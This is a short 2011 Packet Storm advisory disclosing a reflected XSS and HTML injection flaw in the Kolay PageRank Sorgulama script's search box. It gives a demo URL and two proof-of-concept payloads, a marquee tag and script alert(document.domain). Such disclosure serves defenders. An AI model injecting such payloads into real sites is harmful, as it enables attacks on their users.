Kolay PageRank Sorgulama Cross Site Scripting

2011-08-14T00:00:00
ID PACKETSTORM:104023
Type packetstorm
Reporter darkTR
Modified 2011-08-14T00:00:00

Description

                                        
                                            `< ------------------- header data start ------------------- >  
  
# Application Name: Kolay PageRank Sorgulama XSS Vuln.  
  
# Author: darkTR  
  
# Date: 14.08.2011  
  
# Example: http://scripti.org/demo.php?id=2448  
# Vulnerable Type: Reflected XSS  
  
# Fixed: Zararlı Karakterler Filitrelenmelidir.  
  
  
< -- bug code start -- >  
  
// Post Search Box  
  
HTML İnjection ;  
  
<marquee>darkTR</marquee>  
  
XSS Vuln ;  
  
<script>alert(document.domain)</script>  
  
< -- bug code end of -- >  
  
< ------------------- header data end of ------------------->   
`